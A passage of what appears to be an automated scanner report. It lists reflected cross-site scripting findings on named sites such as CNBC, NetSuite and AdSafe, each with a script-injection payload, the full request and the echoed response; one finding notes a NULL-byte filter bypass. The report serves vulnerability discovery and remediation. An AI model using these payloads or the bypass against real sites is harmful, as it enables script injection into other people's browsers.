The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59238'-alert(1)-'0408d9d8ef3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mytest/ipecho.php59238'-alert(1)-'0408d9d8ef3 HTTP/1.1
Host: m.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:05:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: 0
Last-Modified: Tue, 06 Sep 2011 15:05:20 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Via: 1.1 aicache6
Content-Length: 4642
X-Aicache-OS: 64.210.193.252:80
Connection: close

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/mytest/ipecho.php59238'-alert(1)-'0408d9d8ef3?refresh=true\'',300000)</script>
...[SNIP]...

3.56. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard [mbox parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://netsuite.tt.omtrdc.net
Path:   /m2/netsuite/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 9ed34<script>alert(1)</script>42adcdc5dfa was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPage=1315341135013-154927&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=me-ecomm-form-test9ed34<script>alert(1)</script>42adcdc5dfa&mboxId=0&mboxTime=1315323135041&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fseo-landing-page%2Fecommerce%2Fecommerce-2.html%3Fgclid%3DCMyov8D4iKsCFSBCgwodRnXLzA&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&mboxVersion=40 HTTP/1.1
Host: netsuite.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315341135013-154927.19; Domain=netsuite.tt.omtrdc.net; Expires=Tue, 20-Sep-2011 15:33:19 GMT; Path=/m2/netsuite
Content-Type: text/javascript
Content-Length: 214
Date: Tue, 06 Sep 2011 15:33:18 GMT
Server: Test & Target

mboxFactories.get('default').get('me-ecomm-form-test9ed34<script>alert(1)</script>42adcdc5dfa',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315341135013-154927.19");

3.57. http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pg.links.channelintelligence.com
Path:   /pages/CBLJS.asp

Issue detail

The value of the sLinkJSData request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3d3c'%3balert(1)//7a40c4d48d9 was submitted in the sLinkJSData parameter. This input was echoed as f3d3c';alert(1)//7a40c4d48d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/CBLJS.asp?sLinkJSData=upc%3D047400098978f3d3c'%3balert(1)//7a40c4d48d9&cii_sSKU=047400098978&cii_nRGID=1964 HTTP/1.1
Host: pg.links.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 35613
Cache-Control: public, max-age=3563
Expires: Tue, 06 Sep 2011 17:45:22 GMT
Date: Tue, 06 Sep 2011 16:45:59 GMT
Connection: close


function ChangeRows(roForm,rnRows){roForm.nRows.value=rnRows;roForm.submit();}
function ChangePage(roForm,rnCurrentPage){roForm.nStart.options[rnCurrentPage].selected=true;roForm.submit();}

/*

...[SNIP]...
610","middle","center",true,"",true,false,false,false,true);goWin.focus();}
function cii_VARInfo(rsCustomer,rsZip,rsSKU,rnRGID,nPGID,nVID,nRadius,nHeight,nWidth,sStatusBar){var sUrl='?upc=047400098978f3d3c';alert(1)//7a40c4d48d9&cii_nSCID=28&cii_nCTID=29&cii_sZip='+rsZip+'&cii_sSKU='+escape(rsSKU).replace('+','%2B')+'&cii_nVID='+nVID+'&cii_nRGID='+rnRGID+'&cii_nPGID='+nPGID+'&cii_nRadius='+nRadius;var oWin=ykb_PopUp('VARInfo'
...[SNIP]...

3.58. http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pg.links.channelintelligence.com
Path:   /pages/CBLJS.asp

Issue detail

The value of the sLinkJSData request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94563"%3balert(1)//be0c49fb5ff was submitted in the sLinkJSData parameter. This input was echoed as 94563";alert(1)//be0c49fb5ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /pages/CBLJS.asp?sLinkJSData=upc%3D04740009897894563"%3balert(1)//be0c49fb5ff&cii_sSKU=047400098978&cii_nRGID=1964 HTTP/1.1
Host: pg.links.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 35613
Cache-Control: public, max-age=3554
Expires: Tue, 06 Sep 2011 17:45:08 GMT
Date: Tue, 06 Sep 2011 16:45:54 GMT
Connection: close


function ChangeRows(roForm,rnRows){roForm.nRows.value=rnRows;roForm.submit();}
function ChangePage(roForm,rnCurrentPage){roForm.nStart.options[rnCurrentPage].selected=true;roForm.submit();}

/*

...[SNIP]...
ocID="+rnLocID+"&cii_nRGID=1964&cii_nPGID=0&cii_nRadius=15";document.location = sUrl;}
function cii_ShowLocations(rnSCID,rnCTID,rnVID,rnLocID,rnStoreID,rnVStoreID,rnColPos){var sUrl="?upc=04740009897894563";alert(1)//be0c49fb5ff&cii_nSCID="+rnSCID+"&cii_nCTID="+rnCTID+"&cii_sZip=&cii_nIID=163810295&cii_sSKU="+escape("047400098978").replace("+","%2B")+"&cii_nVID="+rnVID+"&cii_nLocID="+rnLocID+"&cii_nStoreID="+rnStoreID+"&cii_n
...[SNIP]...

3.59. http://ping.crowdscience.com/ping.js [m parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %006c87d'%3balert(1)//7d11b67251b was submitted in the m parameter. This input was echoed as 6c87d';alert(1)//7d11b67251b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this filtering can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ping.js?url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&id=5c5c650d27&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.220%20safari%2F535.1&x=1315341159227&c=0&t=0&v=0&m=0%006c87d'%3balert(1)//7d11b67251b&vn=2.0.4 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:33:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=53404c51af1f5e49; Domain=.crowdscience.com; expires=Mon, 05 Dec 2011 15:33:02; Path=/
Content-Length: 8035
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain


(function (){

var cs = CrowdScience;

cs.state = 1; // cs.states.ping_loading;

cs.invitation_beforeShow = function() {};
cs.invitation_afterShow = function() {};

cs.i
...[SNIP]...
f5524dcb2c411c47c&vguid=53404c51af1f5e49&sc=eNotjEEOwjAMBP/icxTZ3tiO8xtUhOBURIs4IP5OKnVPc5jZLz0/NKRyoff9sW80oECE1QyzFFZkoW25ndJledEw5oOv62R4heicNFEGZyu07CuNqTA3tc4yj6CR4q6Fjki9uvZEWkTL9I7fH93NH90=&m=0.6c87d';alert(1)//7d11b67251b&style=' + self.style;
return self;
})();


CrowdScience.imageUrls = [
'http://static.crowdscience.com/invlogo/dir02/logo_2_59cd36bf0aee
...[SNIP]...

3.60. http://pixel.adsafeprotected.com/jspix [anId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 510c5"-alert(1)-"dd817178b4e was submitted in the anId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144510c5"-alert(1)-"dd817178b4e&pubId=4749&campId=176996 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=81B90065048D4370292026025CE18CDC; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:42 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144510c5"-alert(1)-"dd817178b4e&pubId=4749&campId=176996",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsrdhvt9"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var
...[SNIP]...

3.61. http://pixel.adsafeprotected.com/jspix [campId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da845"-alert(1)-"880f48e2e1c was submitted in the campId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=4749&campId=176996da845"-alert(1)-"880f48e2e1c HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=35EB1F19FAC898AF05DFBC3B925C5071; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:42 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=4749&campId=176996da845"-alert(1)-"880f48e2e1c",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsrdhw0z"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log",
...[SNIP]...

3.62. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29f17"-alert(1)-"0d89877785d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=4749&campId=176996&29f17"-alert(1)-"0d89877785d=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FB69FF41E9D06173F3B7D3D9C3729F77; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:42 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=4749&campId=176996&29f17"-alert(1)-"0d89877785d=1",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsrdhw3w"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log
...[SNIP]...

3.63. http://pixel.adsafeprotected.com/jspix [pubId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.adsafeprotected.com
Path:   /jspix

Issue detail

The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b063c"-alert(1)-"1e31f51b3df was submitted in the pubId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jspix?anId=144&pubId=4749b063c"-alert(1)-"1e31f51b3df&campId=176996 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=15F3A88A83B937D289F19131BE7257D4; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:41 GMT
Connection: close


var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=4749b063c"-alert(1)-"1e31f51b3df&campId=176996",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsrdhvsx"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"in
...[SNIP]...

3.64. http://quote.cnbc.com/quote-html-webservice/quote.htm [&symbols parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://quote.cnbc.com
Path:   /quote-html-webservice/quote.htm

Issue detail

The value of the &symbols request parameter is copied into the HTML document as plain text between tags. The payload 4f61d<img%20src%3da%20onerror%3dalert(1)>e62cc5d307c was submitted in the &symbols parameter. This input was echoed as 4f61d<img src=a onerror=alert(1)>e62cc5d307c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /quote-html-webservice/quote.htm?&symbols=.GDAXI|4f61d<img%20src%3da%20onerror%3dalert(1)>e62cc5d307c&requestMethod=quick&noform=1&realtime=1&client=flexQuote&output=json&random=1315338996212 HTTP/1.1
Host: quote.cnbc.com
Proxy-Connection: keep-alive
Referer: http://quote.cnbc.com/quoteproxy.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; __qseg=Q_D; s_nr=1315338989816; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CNews%25257CAllT%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257B%252520cnbc_multionclick%252528%252527http%25253A//www.cnbc.com/%252527%252529%25253B%25257D%2526oidt%253D2%2526ot%253DDIV

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/x-json;charset=UTF-8
Content-Language: en-US
Date: Tue, 06 Sep 2011 14:57:30 GMT
Via: 1.1 C aicache6
Content-Length: 980
X-Aicache-OS: 64.210.195.136:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Tue, 06 Sep 2011 14:57:35 GMT


{"QuickQuoteResult":{"QuickQuote":[{"change_pct":"-1.61","last":"5161.68","curmktstatus":"REG_MKT","change":"-84.50","reg_last_time":"2011-09-06T16:42:29.000+0200","timeZone":"ECT","last_time":"
...[SNIP]...
"false","altSymbol":"DAX-XE","volume":"189930268","todays_closing":"0.0","previous_day_closing":"5246.18","high":"5332.11","low":"5150.05","comments":"ILX","last_time_msec":"1315320149000"},{"symbol":"4F61D<IMG SRC=A ONERROR=ALERT(1)>E62CC5D307C","code":"1"}],"xmlns:xsi":"http://www.w3.org/2001/XMLSchema-instance","xmlns":"http://quote.cnbc.com/services/MultiQuote/2006"}}

3.65. http://search.cnbc.com/main.do [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ae86</script><script>alert(1)</script>06ada94b268662ae5 was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main.do?target=all&keywords=xss4ae86</script><script>alert(1)</script>06ada94b268662ae5&categories=exclude&searchboxinput=xss HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
Origin: http://www.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; adops_master_kvs=; snas_noinfo=1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:47 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 84843
X-Aicache-OS: 64.210.194.245:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:47 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss4ae86</script>
...[SNIP]...
<script>

keyWordParam = "xss4ae86</script><script>alert(1)</script>06ada94b268662ae5";
keyWordParam = keyWordParam.replace(/&quot;/g,'"');
document.getElementById('txtBox').value = keyWordParam;

</script>
...[SNIP]...

3.66. http://search.cnbc.com/main.do [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the keywords request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86fbc</script><script>alert(1)</script>0a30be6899a was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /main.do?keywords=xss86fbc</script><script>alert(1)</script>0a30be6899a&sort=date&minimumrelevance=0.2&topics=slideshows&pubtime=0&pubfreq=h HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; TZM=-300; snas_noinfo=1; s_cc=true; adops_master_kvs=; __qseg=Q_D; s_nr=1315339031577; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Djavascript%25253AloadParamURL%252528keyWordParam%25252C%252527date%252527%25252C0%25252C%252527h%252527%25252C%252527%252526topics%25253Dslideshows%252527%252529%25253B%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:57:51 GMT
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2 mod_jk/1.2.19
Content-Type: text/html
Via: 1.1 C aicache6
Content-Length: 85231
X-Aicache-OS: 64.210.194.247:80
Connection: close
Expires: Tue, 06 Sep 2011 15:07:51 GMT

<html>
<head>
<!-- Adding velocity template for meta tags -->

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta name="description" content="CNBC Search, xss86fbc</script>
...[SNIP]...
<script>

keyWordParam = "xss86fbc</script><script>alert(1)</script>0a30be6899a";
keyWordParam = keyWordParam.replace(/&quot;/g,'"');
document.getElementById('txtBox').value = keyWordParam;

</script>
...[SNIP]...

3.67. http://search.cnbc.com/main.do [keywords parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.cnbc.com
Path:   /main.do

Issue detail

The value of the keywords request parameter is copied into the HTML document as text between TITLE tags. The payload 8364e</title><script>alert(1)</script>07d9d84cea13b502c was submitted in the keywords parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method; however, it was possible to convert the request to use the GET method, which enables easier demonstration and delivery of the attack.

Request

GET /main.do?target=all&keywords=xss8364e</title><script>alert(1)</script>07d9d84cea13b502c&categories=exclude&searchboxinput=xss HTTP/1.1
Host: search.cnbc.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/
Cache-Control: max-age=0
Origin: http://www.cnbc.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
